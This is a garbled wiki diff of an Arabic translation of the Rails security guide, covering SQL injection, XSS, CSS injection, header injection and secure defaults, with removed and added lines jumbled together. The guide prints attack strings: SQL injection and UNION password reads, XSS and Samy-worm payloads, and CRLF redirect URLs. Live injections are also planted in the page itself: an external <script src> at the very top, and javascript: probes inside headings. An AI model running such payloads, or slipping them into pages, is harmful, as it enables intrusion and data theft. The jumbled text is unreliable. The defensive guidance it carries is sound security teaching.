 <script src=http://www.securitylab.ru/test/sc.js></script><!--
  
هذا قد يعمل بشكل جيد في بعض اللغات. ومع ذلك، في روبي ^ و $ يطابق خط البداية ونهاية الخط. وبالتالي فإن عنوان URL مثل هذا يمرر الفلتر بدون مشاكل:
+
===== التدابير المضادة =====
 +
من المهم للغاية تصفية المدخلات الضارة، ولكن من المهم أيضًا التخلص من إخراج تطبيق الويب.
  
javascript:exploit_code();/*
+
خاصة بالنسبة إلى XSS، من المهم القيام بتصفية الإدخال إلى القائمة البيضاء بدلاً من القائمة السوداء. تشير تصفية القائمة البيضاء إلى القيم المسموح بها على عكس القيم غير المسموح بها. القوائم السوداء ليست كاملة أبدا.
 +
 
 +
تخيل القائمة السوداء حذف "script" من إدخال المستخدم. الآن المهاجم حقن "<scrscriptipt>"، وبعد تصفية، "<script>" لا يزال قائما. تستخدم الإصدارات السابقة من Rails نهج القائمة السوداء لـ() strip_tags و() strip_links وطريقة() sanitize. لذلك كان هذا النوع من الحقن ممكنًا:
 +
 
 +
strip_tags("some<<nowiki><b>script>alert('hello')<</b></nowiki>/script>")
  
<nowiki>http://hi.com</nowiki>
+
هذا يرجع "some<script>alert('hello')</script>"، مما يجعل عمل الهجوم. وهذا هو السبب في أن نهج القائمة البيضاء أفضل، باستخدام تابع Rails 2 المحدثة sanitize():
  
<nowiki>*</nowiki>/
+
tags = %w(a acronym b strong i em li ul ol h1 h2 h3 h4 h5 h6 blockquote br cite sub sup ins p)
  
يجتاز عنوان URL هذا الفلتر؛ لأن التعبير العادي يطابق - السطر الثاني، لا يهم البقية. الآن تخيل أنه لدينا عرضًا أظهر عنوان URL مثل هذا:
+
s = sanitize(user_input, tags: tags, attributes: %w(href title))
  
link_to "Homepage", @user.homepage
+
هذا يسمح فقط للعلامات المحددة ويعمل بطريقة جيدة، حتى ضد جميع أنواع الحيل والعلامات المشوهة.
  
يبدو الارتباط بريئًا للزائرين، ولكن عند النقر عليه، ينفذ وظيفة JavaScript "exploit_code" أو أي JavaScript آخر يوفره المهاجم.
+
كخطوة ثانية، من الممارسات الجيدة التخلص من كل مخرجات التطبيق، خاصة عند إعادة عرض مدخلات المستخدم، والتي لم ترشح (كما هو موضح في مثال نموذج البحث في وقت سابق). استخدم ()escapeHTML أو تابع ()alias h لاستبدال أحرف HTML المدخلة & "، <، و> من خلال تمثيلها كغير مترجمة في (;HTML (&amp;amp;, &amp;quot;, &amp;lt;, and &gt.
  
لإصلاح التعبير العادي، يجب استخدام \ A و \ z بدلاً من ^ و $، مثل:
+
===== التشوش وحقن الترميز =====
 +
تعتمد حركة مرور الشبكة في الغالب على الأبجدية الغربية المحدودة، لذا ظهرت ترميزات جديدة للشخصية، مثل Unicode، لنقل الأحرف بلغات أخرى. ولكن هذا يمثل أيضًا تهديدًا لتطبيقات الويب، حيث يمكن إخفاء الشفرة الضارة في ترميزات مختلفة قد يتمكن متصفح الويب من معالجتها، ولكن قد لا يكون تطبيق الويب كذلك. في ما يلي متجه الهجوم بتشفير UTF-8:
  
/\Ahttps?:\/\/[^\n]+\z/i
+
<IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;
  
بما أن هذا خطأ متكرر، فإن مدقق الصيغة (validates_format_of) يطرح الآن استثناء إذا كان التعبير العادي المقدم يبدأ بـ ^ أو ينتهي بـ $. إذا كنت بحاجة إلى استخدام ^ و $ بدلاً من \ A و \ z (وهو أمر نادر الحدوث)، فيمكنك تعيين: خيار متعدد الأسطر إلى true، مثل:
+
 &amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;>
  
<nowiki>#</nowiki> content should include a line "Meanwhile" anywhere in the string
+
هذا المثال للإعلان المنبثق لمربع الرسالة. يتعرف عليه من قبل مرشح ()sanitize أعلاه، على الرغم من انها أداة رائعة لتعتيم وترميز السلاسل، وبالتالي "تعرف على عدوك"، هي Hackvertor. تابع ()Rails' sanitize يعمل جيدًا لصد هجمات الترميز.
  
validates :content, format: { with: /^Meanwhile$/, multiline: true }
+
==== أمثلة من تحت الأرض ====
 +
من أجل فهم هجمات اليوم على تطبيقات الويب، من الأفضل إلقاء نظرة على بعض نواقل الهجوم الحقيقي.
  
لاحظ أن هذا لا يحميك إلا من الخطأ الأكثر شيوعًا عند استخدام أداة التحقق من الصيغة - عليك دائمًا أن تضع في اعتبارك أن ^ و $ يتطابقان مع بداية السطر ونهاية السطر في Ruby، وليس بداية ونهاية السلسلة.
+
فيما يلي مقتطفات من !Js.Yamanner@m Yahoo دودة البريد. ظهرت في 11 يونيو 2006 وكانت أول دودة واجهة بريد الويب:
  
=== تصعيد الصلاحيات ===
+
<img src='<nowiki>http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif'</nowiki>
ملاحظة: قد يؤدي تغيير معامل واحد إلى منح المستخدم وصولاً غير مصرح به. تذكر أنه قد يتغير كل معامل، بغض النظر عن مدى إخفاءه أو تشويشه.
 
  
المعامل الأكثر شيوعًا التي قد يعبث بها المستخدم هو معامل المعرّف، كما هو الحال في <nowiki>http://www.domain.com/project/1،</nowiki> في حين أن الرقم 1 هو المعرف. سوف تكون متاحة في params في وحدة تحكم. هناك، على الأرجح ستفعل شيئًا كالتالي:
+
 target=""onload="var http_request = false;    var Email = <nowiki>''</nowiki>;
  
@project = Project.find(params[:id])
+
 var IDList = <nowiki>''</nowiki>;   var CRumb = <nowiki>''</nowiki>;  function makeRequest(url, Func, Method,Param) { ...
  
هذا أمر لا بأس به بالنسبة لبعض تطبيقات الويب، ولكن بالتأكيد ليس إذا كان المستخدم غير مخول لعرض جميع المشاريع. إذا غيّر المستخدم المعرف إلى 42، ولا يُسمح له برؤية تلك المعلومات، فسيكون بإمكانه الوصول إليها على أي حال. بدلاً من ذلك، استفسر عن حقوق وصول المستخدم أيضًا:
+
تستغل هذه الديدان ثغرة في مرشح HTML / JavaScript من Yahoo، والذي يعيد تصفية كل الأهداف وخصائص onload من العلامات (لأنه يمكن أن يكون JavaScript). يطبق المرشح مرة واحدة فقط، ومع ذلك، تبقى السمة onload مع رمز الدودة في مكانها. هذا مثال جيد على عدم اكتمال عوامل تصفية القائمة السوداء ولماذا يصعب السماح باستخدام HTML / JavaScript في تطبيق ويب.
  
@project = @current_user.projects.find(params[:id])
+
وهناك دودة بريد إلكتروني أخرى تعتمد على مفهوم الإنترنت وهي Nduja، وهي دودة عبر النطاقات لأربعة خدمات بريد ويب إيطالية. العثور على مزيد من التفاصيل حول ورقة Rosario Valotta's. هدف كل من worms بريد الويب هو حصاد عناوين البريد الإلكتروني، وهو أمر يمكن أن يجرمه قرصان إجرامي.
  
اعتمادًا على تطبيق الويب الخاص بك، سيكون هناك العديد من المعاملات التي يمكن للمستخدم التلاعب بها. كقاعدة عامة، لا توجد بيانات إدخال المستخدم آمنة، حتى يثبت العكس، ومن المحتمل أن يتعامل مع كل معامل من المستخدم.
+
في ديسمبر 2006، سرق 34000 اسم مستخدم وكلمة مرور فعلية في هجوم MySpace Phishing. كانت فكرة الهجوم إنشاء صفحة ملف شخصي باسم "login_home_index_html"، لذلك بدا عنوان URL مقنعًا جدًا. استخدم HTML و CSS المصنوعين خصيصًا لإخفاء محتوى MySpace الأصلي من الصفحة وبدلاً من ذلك عرض نموذج تسجيل الدخول الخاص به.
  
لا تنخدع بالأمن عن طريق التعتيم وأمن JavaScript. تتيح لك أدوات المطوّرين مراجعة الحقول المخفية لكل نموذج وتغييرها. يمكن استخدام JavaScript للتحقق من صحة بيانات إدخال المستخدم، ولكن بالتأكيد لا يمنع المهاجمين من إرسال طلبات ضارة ذات قيم غير متوقعة. تسجل الوظيفة الإضافية Firebug لـ Mozilla Firefox كل طلب وقد تكررها وتغيرها. هذه طريقة سهلة لتجاوز أي عمليات التحقق من جافا سكريبت. وهناك أيضًا البروكسي من جانب العميل تسمح لك باعتراض أي طلب واستجابة من وإلى الإنترنت.
+
=== حقن CSS ===
 +
ملاحظة: حقن CSS هو في الواقع حقن جافا سكريبت، لأن بعض المتصفحات (IE، بعض إصدارات Safari وغيرها) تسمح JavaScript في CSS. فكر مرتين في السماح باستخدام CSS مخصص في تطبيق الويب الخاص بك.
  
== الحقن ==
+
توضح CSS Injection أفضل من دودة MySpace Samy المعروفة. أرسلت هذه الدودة تلقائيًا طلب صداقة إلى سامي (المهاجم) ببساطة عن طريق زيارة ملفه الشخصي. في غضون عدة ساعات ، كان لديه أكثر من مليون طلب صداقة، مما أدى إلى زيادة عدد الزيارات التي لم يكن MySpace في وضع عدم الاتصال. ما يلي هو تفسير تقني لتلك الدودة.
ملاحظة: الحقن هو فئة من الهجمات التي تدخل رمز أو معاملات ضارة في تطبيق ويب من أجل تشغيله ضمن سياق الأمان الخاص به. الأمثلة البارزة للحقن هي البرمجة عبر المواقع (XSS) وحقن SQL.
 
  
الحقن صعب للغاية، لأن نفس الكود أو المعامل يمكن أن تكون خبيثة في سياق واحد، ولكنها غير ضارة تمامًا في سياق آخر. يمكن أن يكون السياق عبارة عن لغة برمجة نصية أو استعلام أو لغة برمجة أو shell أو طريقة Ruby / Rails. تغطي الأقسام التالية جميع السياقات المهمة التي قد تحدث فيها هجمات الحقن. القسم الأول، ومع ذلك، يغطي قرار معماري فيما يتعلق حقن.
+
قام MySpace بحظر العديد من العلامات، ولكنه سمح CSS. لذا وضع مؤلف ديدان JavaScript في CSS مثل:
  
=== القوائم البيضاء والقوائم السوداء ===
+
<nowiki><div style="background:url('javascript:alert(1)')"></nowiki>
ملاحظة: عند تطهير شيء ما أو حمايته أو التحقق منه، تفضل القوائم البيضاء فوق القوائم السوداء.
 
  
يمكن أن تكون القائمة السوداء قائمة بعناوين البريد الإلكتروني السيئة أو الإجراءات غير العامة أو علامات HTML غير الصحيحة. هذا يعارض القائمة البيضاء التي تسرد عناوين البريد الإلكتروني الجيدة، والإجراءات العامة، وعلامات HTML الجيدة وما إلى ذلك. على الرغم من أنه من غير الممكن في بعض الأحيان إنشاء قائمة بيضاء (في مرشح الرسائل الاقتحامية، على سبيل المثال)، تفضل استخدام طرق القائمة البيضاء:
+
ولذلك فإن الحمولة في سمة النمط. ولكن لا توجد علامات اقتباس مسموح بها في الحمولة، لأن علامات الاقتباس الفردية والمزدوجة قد استخدمت بالفعل. لكن JavaScript يحتوي على دالة () eval سهلة التنفيذ والتي تنفذ أي سلسلة كرمز.
* استخدم before_action باستثناء: [...] بدلاً من فقط: [...] للإجراءات المتعلقة بالأمان. بهذه الطريقة لا تنس أن تقوم بتمكين التحقق من الأمان للإجراءات المضافة حديثًا.
 
* اسمح باستخدام <nowiki><strong> بدلاً من إزالة <script> ضد البرمجة النصية عبر المواقع (XSS). انظر أدناه للحصول على التفاصيل.</nowiki>
 
* لا تحاول تصحيح إدخال المستخدم بواسطة القوائم السوداء:
 
  
* هذا سيجعل الهجوم يعمل: ("","<sc<script>ript>".gsub("<script>"
+
<di id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')">
* لكن ارفض الإدخال غير الصحيح.
 
القوائم البيضاء هي أيضاً مقاربة جيدة ضد العامل البشري في نسيان شيء ما في القائمة السوداء.
 
  
=== حقن SQL ===
+
الدالة ()eval هي كابوس لفلاتر إدخال القائمة السوداء، حيث أنها تسمح لسمة النمط بإخفاء كلمة "innerHTML":
ملاحظة: وبفضل الأساليب الذكية، لا يعد ذلك مشكلة في معظم تطبيقات Rails. ومع ذلك، هذا هجوم مدمر وشائع في تطبيقات الويب، لذلك من المهم فهم المشكلة.
 
  
==== المقدمة ====
+
alert(eval('document.body.inne' + 'rHTML'));
تهدف هجمات حقن SQL إلى التأثير على استعلامات قاعدة البيانات عن طريق معالجة معاملات تطبيق الويب. الهدف الشائع من هجمات حقن SQL هو تجاوز التفويض. هدف آخر هو تنفيذ معالجة البيانات أو قراءة البيانات التعسفية. في ما يلي مثال على كيفية عدم استخدام بيانات إدخال المستخدم في استعلام:
 
  
Project.where("name = '#{params[:name]}'")
+
كانت المشكلة التالية هي MySpace تصفية الكلمة "javascript"، لذلك استخدم المؤلف "java <NEWLINE> script" للتغلب على هذا:
  
قد يكون هذا في إجراء بحث ويمكن للمستخدم إدخال اسم مشروع يريد العثور عليه. إذا قام مستخدم ضار بإدخال --OR 1' فإن استعلام SQL الناتج سيكون:
+
<nowiki><div id="mycode" expr="alert('hah!')" style="background:url('java↵
script:eval(document.all.mycode.expr)')"></nowiki>
  
SELECT * FROM projects WHERE name = ' ' OR 1 --'
+
مشكلة أخرى لمؤلف الدودة كانت الرموز الأمنية CSRF. بدونهم لم يتمكن من إرسال طلب صداقة على POST. حصل حول ذلك عن طريق إرسال GET إلى الصفحة مباشرة قبل إضافة المستخدم وتحليل النتيجة للرمز CSRF.
  
تبدأ الشرطتان تعليقًا يتجاهل كل شيء بعده. لذا يرجع الاستعلام كافة السجلات من جدول المشاريع بما في ذلك المحجوبة للمستخدم. وذلك لأن الشرط صحيح لجميع السجلات.
+
في النهاية، حصل على 4 كيلو دودة، والتي حقنها في صفحته الشخصية.
  
==== تجاوز التخويل ====
+
أثبتت خاصية CSS moz-binding أنها طريقة أخرى لإدخال JavaScript في CSS في المتصفحات القائمة على  Gecko
عادة ما يتضمن تطبيق الويب التحكم في الوصول. يدخل المستخدم بيانات اعتماد تسجيل الدخول الخاصة بهم ويحاول تطبيق الويب العثور على السجل المطابق في جدول المستخدمين. يمنح التطبيق الوصول عندما يجد سجلاً. ومع ذلك، قد يتجاوز المهاجم هذا التحقق باستخدام إدخال SQL. يعرض المثال التالي استعلامًا نموذجيًا لقاعدة البيانات في Rails للعثور على السجل الأول في جدول المستخدمين الذي يطابق معاملات بيانات اعتماد تسجيل الدخول التي يوفرها المستخدم.
 
  
User.find_by("login = '#{params[:name]}' AND password = '#{params[:password]}'")
+
(Firefox، على سبيل المثال).
  
إذا قام المهاجم بإدخال 'OR' 1 '=' 1 كاسم، و 'OR' 2 '>' 1 ككلمة المرور، فسيكون استعلام SQL الناتج:
+
==== التدابير المضادة<img src=javascript:alert('Hello')> ====
  
SELECT * FROM users WHERE login = <nowiki>''</nowiki> OR '1'='1' AND password = <nowiki>''</nowiki> OR '2'>'1' LIMIT 1
+
==== <nowiki><table background="javascript:alert('Hello')">uipipipoppopopopo9</nowiki> ====
 +
هذا المثال، مرة أخرى، أظهر أن فلتر القائمة السوداء لا يكتمل أبدًا. ومع ذلك، نظرًا لأن ميزة CSS المخصصة في تطبيقات الويب تعد ميزة نادرة للغاية، فقد يكون من الصعب العثور على مرشح CSS للصفحات البيضاء. إذا كنت تريد السماح بألوان أو صور مخصصة، فيمكنك السماح للمستخدم باختيارها وإنشاء CSS في تطبيق الويب. استخدم تابع ()Rails' sanitize كنموذج لمرشح CSS للصفحات البيضاء، إذا كنت تحتاج بالفعل إلى واحد.
  
سيجد هذا ببساطة السجل الأول في قاعدة البيانات، ويمنح الوصول إلى هذا المستخدم.
+
=== حقن النسيج ===
 +
إذا كنت ترغب في توفير تنسيق النص بخلاف HTML (بسبب الأمان)، فاستخدم لغة ترميزية تحولت إلى HTML على جانب الخادم. RedCloth لغة مثل لغة Ruby، ولكن بدون الاحتياطات، فإنها أيضًا عرضة لـ XSS.
  
==== قراءة غير مصرح بها ====
+
على سبيل المثال، يترجم RedCloth _test_ إلى <nowiki><em> test <em>، مما يجعل النص مائلًا. ومع ذلك، حتى الإصدار الحالي 3.0.4، فإنه لا يزال عرضة ل XSS. احصل على الإصدار 4 الجديد كليًا الذي أزال أخطاءًا خطيرة. ومع ذلك، حتى هذا الإصدار يحتوي على بعض الأخطاء الأمنية، لذلك لا تزال تطبق التدابير المضادة. في ما يلي مثال للإصدار 3.0.4:</nowiki>
ربط العبارة UNION استعلامات SQL اثنين وإرجاع البيانات في مجموعة واحدة. يمكن للمهاجم استخدامه لقراءة البيانات التعسفية من قاعدة البيانات. لنأخذ المثال من الأعلى:
 
  
Project.where("name = '#{params[:name]}'")
+
RedCloth.new('<script>alert(1)</script>').to_html
  
والآن دعونا نحقن استعلام آخر باستخدام بيان UNION:
+
<nowiki>#</nowiki> => "<nowiki><script>alert(1)</script></nowiki>"
  
') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users --
+
استخدم الخيار: filter_html لإزالة HTML الذي لم ينشأ بواسطة معالج Textile.
  
سيؤدي ذلك إلى استعلام SQL التالي:
+
RedCloth.new('<nowiki><script>alert(1)</script></nowiki>', [:filter_html]).to_html
  
SELECT * FROM projects WHERE (name = <nowiki>''</nowiki>) UNION
+
<nowiki>#</nowiki> => "alert(1)"
  
 SELECT id,login AS name,password AS description,1,1,1 FROM users --'
+
ومع ذلك، لا يؤدي ذلك إلى تصفية كل HTML، حيث تترك بعض العلامات (حسب التصميم)، على سبيل المثال <a>:
  
لن تكون النتيجة قائمة مشاريع (لأنه لا يوجد مشروع باسم فارغ)، ولكن قائمة بأسماء المستخدمين وكلمات المرور الخاصة بهم. نأمل أن تكون كلمات المرور مشفرة في قاعدة البيانات! المشكلة الوحيدة للمهاجم هي أن عدد الأعمدة يجب أن يكون هو نفسه في كلا الاستعلامات. هذا هو السبب في أن الاستعلام الثاني يتضمن قائمة بالأسماء (1)، والتي ستكون دائمًا القيمة 1، لمطابقة عدد الأعمدة في طلب البحث الأول.
+
RedCloth.new("<nowiki><a href='javascript:alert(1)'>hello</a></nowiki>", [:filter_html]).to_html
  
أيضاً، يعيد الاستعلام الثاني تسمية بعض الأعمدة باستخدام عبارة AS بحيث يعرض تطبيق الويب القيم من جدول المستخدم. تأكد من تحديث Rails الخاصة بك إلى 2.1.1 على الأقل.
+
<nowiki>#</nowiki> => "<nowiki><p><a href="javascript:alert(1)">hello</a></nowiki><nowiki></p></nowiki>
  
 
==== التدابير المضادة ====
 
==== التدابير المضادة ====
يحتوي Ruby on Rails على فلتر مدمج لأحرف SQL الخاصة، والتي ستفوق "، حرف NULL وفواصل الأسطر. استخدم  
+
من المستحسن استخدام RedCloth مع فلتر إدخال القائمة البيضاء، كما هو موضح في الإجراءات المضادة لقسم XSS.
 +
 
 +
=== حقن Ajax ===
 +
ملاحظة: يجب اتخاذ الاحتياطات الأمنية نفسها لإجراءات Ajax مثل الإجراءات "العادية". ومع ذلك، هناك استثناء واحد على الأقل: يجب التخلص من الإخراج في وحدة التحكم بالفعل، إذا لم يقدم الإجراء عرضًا.
 +
 
 +
إذا كنت تستخدم المكوِّن الإضافي in_place_editor، أو إجراءات تعيد سلسلة، بدلاً من عرض ملف شخصي، فيجب عليك التخلص  من قيمة الإرجاع في الإجراء. بخلاف ذلك، إذا كانت قيمة الإرجاع تحتوي على سلسلة XSS، تُنفذ الشفرة الضارة عند الرجوع إلى المتصفح. هرب أي قيمة إدخال باستخدام التابع () h.
 +
 
 +
=== حقن سطر الأوامر ===
 +
ملاحظة: استخدم معاملات سطر الأوامر الموفر من قبل المستخدم بحذر.
 +
 
 +
إذا كان للتطبيق الخاص بك تنفيذ الأوامر في نظام التشغيل الأساسي، فهناك عدة طرق في Ruby: exec (command)  syscall (command)  system (command) and command. يجب عليك أن تكون حذرا بشكل خاص مع هذه الوظائف إذا كان المستخدم قد يدخل الأمر كله، أو جزء منه. ويرجع ذلك إلى أنه في معظم الـ shells، يمكنك تنفيذ أمر آخر في نهاية الأمر الأول، وصلهم مع فاصلة منقوطة (؛) أو شريط عمودي (|).
 +
 
 +
يتمثل الإجراء المضاد في استخدام التابع (system(command, parameters الذي يمرر معاملات سطر الأوامر بأمان.
 +
 
 +
system("/bin/echo","hello; rm *")
 +
 
 +
<nowiki>#</nowiki> prints "hello; rm *" and does not delete files
 +
 
 +
=== حقن رأس الصفحة ===
 +
ملاحظة: تنشأ رؤوس صفحة HTTP ديناميكيًا وقد تدخل مدخلات المستخدم في ظروف معينة. يمكن أن يؤدي ذلك إلى إعادة توجيه خاطئة أو تقاطع استجابة XSS أو HTTP.
 +
 
 +
تحتوي رؤوس طلبات HTTP على Referer و User-Agent (برنامج العميل) وحقل ملفات تعريف الارتباط، إلى جانب أشياء أخرى. على سبيل المثال، تحتوي رؤوس صفحة الاستجابة على رمز الحالة، و Cookie و Location (عنوان URL لاستهداف إعادة التوجيه). كل منهم موفر من قبل المستخدم ويمكن التلاعب به بجهد أكبر أو أقل. تذكر أن تفلت من هذه الحقول الرأسية أيضًا. على سبيل المثال، عند عرض وكيل المستخدم في منطقة الإدارة.
 +
 
 +
بالإضافة إلى ذلك، من المهم معرفة ما يحدث عند إنشاء رؤوس استجابة تستند جزئيًا إلى إدخال المستخدم. على سبيل المثال، ترغب في إعادة توجيه المستخدم إلى صفحة معينة. للقيام بذلك، قدمت حقل "مُحيل" في نموذج لإعادة التوجيه إلى العنوان المحدد:
 +
 
 +
redirect_to params[:referer]
 +
 
 +
ما يحدث هو أن Rails تضع السلسلة في حقل رأس الموقع وترسل حالة 302 (إعادة توجيه) إلى المستعرض. أول ما يفعله المستخدم الضار، هو:
 +
 
 +
<nowiki>http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld</nowiki>
 +
 
 +
وبسبب وجود خلل في (Ruby و) Rails حتى الإصدار 2.1.2 (باستثنائه)، قد يحقن أحد المخترقين حقول رأسية عشوائية؛ على سبيل المثال مثل هذا:
 +
 
 +
<nowiki>http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld%0d%0aX-Header:+Hi</nowiki>!
 +
 
 +
<nowiki>http://www.yourapplication.com/controller/action?referer=path/at/your/app%0d%0aLocation:+http://www.malicious.tld</nowiki>
 +
 
 +
تجدر الإشارة إلى أن "٪ 0d٪ 0a" مشفرة بعناوين URL لـ "\ r \ n" وهي عبارة عن حرف إرجاع وتغذية سطر (CRLF) في Ruby. وبالتالي سيكون رأس صفحة HTTP الناتج للمثال الثاني هو التالي لأن حقل عنوان الموقع الثاني يحل محل الكتابة الأولى.
 +
 
 +
HTTP/1.1 302 Moved Temporarily
 +
 
 +
(...)
 +
 
 +
Location: <nowiki>http://www.malicious.tld</nowiki>
 +
 
 +
لذا، تستند نواقل الهجوم لحقن راس الصفحة إلى حقن أحرف CRLF في حقل رأس الصفحة. وماذا يمكن أن يفعل المهاجم مع إعادة توجيه كاذبة؟ يمكنهم إعادة التوجيه إلى موقع تصيد يشبه موقع الويب الخاص بك، ولكن اطلب تسجيل الدخول مرة أخرى (وإرسال بيانات اعتماد تسجيل الدخول إلى المهاجم). أو يمكنهم تثبيت برامج ضارة من خلال ثغرات أمنية للمتصفح على هذا الموقع. يهرب Rails 2.1.2 هذه الأحرف لحقل الموقع في التابع redirect_to. تأكد من القيام بذلك بنفسك عند إنشاء حقول رأس صفحة أخرى بإدخال المستخدم.
 +
 
 +
==== تقسيم الاستجابة ====
 +
إذا كان Header Injection ممكنًا، فقد يكون Response Splitting أيضًا. في HTTP، يتبع كتلة رأس الصفحة اثنين من CRLFs والبيانات الفعلية (عادة HTML). فكرة تقسيم الاستجابة هي إدخال CRLFs اثنين في حقل رأس الصفحة، متبوعة بإجابة أخرى باستخدام HTML الخبيث. سيكون الرد:
 +
 
 +
HTTP/1.1 302 Found [First standard 302 response]
 +
 
 +
Date: Tue, 12 Apr 2005 22:09:07 GMT
 +
 
 +
Location:
Content-Type: text/html
 +
 
 +
HTTP/1.1 200 OK [Second New response created by attacker begins]
 +
 
 +
Content-Type: text/html
 +
 
 +
&amp;lt;html&amp;gt;&amp;lt;font color=red&amp;gt;hey&amp;lt;/font&amp;gt;&amp;lt;/html&amp;gt; [Arbitrary malicious input is
 +
 
 +
Keep-Alive: timeout=15, max=100         shown as the redirected page]
 +
 
 +
Connection: Keep-Alive
 +
 
 +
Transfer-Encoding: chunked
 +
 
 +
Content-Type: text/html
 +
 
 +
في ظل ظروف معينة هذا من شأنه تقديم HTML الضارة إلى الضحية. ومع ذلك، يبدو أن هذا يعمل فقط مع اتصالات Keep-Alive (وتستخدم العديد من المتصفحات الاتصالات لمرة واحدة). لكن لا يمكنك الاعتماد على هذا. في أي حال، هذا خطأ خطير، ويجب تحديث Rails إلى الإصدار 2.0.5 أو 2.1.2 للقضاء على مخاطر حقن رأس الصفحة (وبالتالي تقسيم الاستجابة).
 +
 
 +
== جيل الاستعلام غير الآمن ==
 +
وبسبب الطريقة التي يفسر بها السجل النشط المعاملات في تركيبة مع الطريقة التي يوزع Rack بها معاملات الاستعلام، كان من الممكن إصدار استعلامات قاعدة بيانات غير متوقعة مع IS NULL حيث clauses. استجابة لهذه المشكلة الأمنية (CVE-2012-2660 ، CVE-2012-2694 و CVE-2013-0155) تم تقديم التابع deep_munge كحل للحفاظ على تأمين Rails بشكل افتراضي.
 +
 
 +
مثال على التعليمة البرمجية الضعيفة التي يمكن استخدامها من قِبل المهاجم، إذا لم يُنفذ deep_munge:
 +
 
 +
unless params[:token].nil?
 +
 
 +
 user = User.find_by_token(params[:token])
 +
 
 +
 user.reset_password!
 +
 
 +
end
 +
 
 +
عندما تكون [params [: token واحدة من: [nil] أو [nil أو nil أو ...] أو ['foo', nil] فإنها ستتجاوز الاختبار لـ nil ، لكن (IS NULL or IN ('foo', NULL حيث ستظل الجمل مضافًة إلى استعلام SQL.
 +
 
 +
للحفاظ على تأمين Rails بشكل افتراضي، يستبدل deep_munge بعض القيم بـ nil. يعرض الجدول أدناه الشكل الذي تبدو عليه المعاملات استنادًا إلى JSON المرسل في الطلب:
 +
{| class="wikitable"
 +
|JSON
 +
|المعاملات
 +
|-
 +
|{ "person": null }
 +
|{ :person => nil }
 +
|-
 +
|{ "person": [] }
 +
|<nowiki>{ :person => [] }</nowiki>
 +
|-
 +
|{ "person": [null] }
 +
|<nowiki>{ :person => [] }</nowiki>
 +
|-
 +
|{ "person": [null, null, ...] }
 +
|<nowiki>{ :person => [] }</nowiki>
 +
|-
 +
|{ "person": ["foo", null] }
 +
|<nowiki>{ :person => ["foo"] }</nowiki>
 +
|}
 +
من الممكن العودة إلى السلوك القديم وتعطيل ميزة deep_munge من إعدادات تكوين التطبيق الخاص بك إذا كنت على علم بالمخاطر وتعرف كيفية التعامل معها:
 +
 
 +
config.action_dispatch.perform_deep_munge = false
 +
 
 +
== رؤوس الصفحة الافتراضية ==
 +
تتلقى كل استجابة HTTP من تطبيق Rails رؤوس الأمان الافتراضية التالية.
 +
 
 +
config.action_dispatch.default_headers = {
 +
 
 +
 'X-Frame-Options' => 'SAMEORIGIN',
 +
 
 +
 'X-XSS-Protection' => '1; mode=block',
 +
 
 +
 'X-Content-Type-Options' => 'nosniff',
 +
 
 +
 'X-Download-Options' => 'noopen',
 +
 
 +
 'X-Permitted-Cross-Domain-Policies' => 'none',
 +
 
 +
 'Referrer-Policy' => 'strict-origin-when-cross-origin'
 +
 
 +
}
 +
 
 +
يمكنك تكوين رؤوس الصفحة الإفتراضية في config / application.rb.
 +
 
 +
config.action_dispatch.default_headers = {
 +
 
 +
 'Header-Name' => 'Header-Value',
 +
 
 +
 'X-Frame-Options' => 'DENY'
 +
 
 +
}
 +
 
 +
أو يمكنك إزالتها.
 +
 
 +
Config.action_dispatch.default_headers.clear
 +
 
 +
في ما يلي قائمة برؤوس الصفحة الشائعة:
 +
* X-Frame-Options:
 +
"SAMEORIGIN" في Rails افتراضيًا - السماح بالإطار على نفس النطاق. اضبطه على "DENY" لرفض التأطير على الإطلاق أو "ALLOWALL" إذا كنت تريد السماح بتأطير جميع مواقع الويب.
 +
* X-XSS-Protection:
 +
'1؛ mode = block 'in Rails بشكل افتراضي - استخدم XSS Auditor و block page إذا تم اكتشاف هجوم XSS. اضبطه على "0" إذا كنت ترغب في تبديل XSS Auditor (مفيدة إذا كانت نصوص استجابة المحتويات من معاملات الطلب)
 +
* X-Content-Type-Options:
 +
"nosniff" في Rails بشكل افتراضي - يوقف المستعرض من تخمين نوع MIME من الملف.
 +
* X-Content-Security-Policy:
 +
آلية قوية للتحكم في المواقع التي يمكن تحميل أنواع معينة من المحتويات منها.
 +
* Access-Control-Allow-Origin:
 +
يُستخدم للتحكم في المواقع المسموح لها بتجاوز سياسات الأصل نفسها وإرسال طلبات عبر الأصل.
 +
* Strict-Transport-Security:
 +
تستخدم للتحكم في ما إذا كان يُسمح للمتصفح بالوصول إلى موقع عبر اتصال آمن فقط.
 +
 
 +
=== سياسة أمن المحتوى ===
 +
يوفر Rails DSL الذي يسمح لك بتكوين "نهج أمان المحتوى" للتطبيق الخاص بك. يمكنك تكوين سياسة افتراضية عامة ثم تجاوزها على أساس كل مورد وحتى استخدام lambdas لإدخال قيم كل طلب في رأس الصفحة مثل نطاقات الحساب الفرعية في تطبيق متعدد المستأجرين.
 +
 
 +
مثال على السياسة العالمية:
 +
 
 +
<nowiki>#</nowiki> config/initializers/content_security_policy.rb
 +
 
 +
Rails.application.config.content_security_policy do |policy|
 +
 
 +
 policy.default_src :self, :https
 +
 
 +
 policy.font_src    :self, :https, :data
 +
 
 +
 policy.img_src     :self, :https, :data
 +
 
 +
 policy.object_src  :none
 +
 
 +
 policy.script_src  :self, :https
 +
 
 +
 policy.style_src   :self, :https
 +
 
 +
<nowiki>#</nowiki> حدد URI لتقارير الانتهاك
 +
 
 +
 policy.report_uri "/csp-violation-report-endpoint"
 +
 
 +
end
 +
 
 +
تتجاوز وحدة تحكم المثال:
 +
 
 +
<nowiki>#</nowiki> تجاوز السياسة المضمنة
 +
 
 +
class PostsController < ApplicationController
 +
 
 +
 content_security_policy do |p|
 +
 
 +
   p.upgrade_insecure_requests true
 +
 
 +
 end
 +
 
 +
End
  
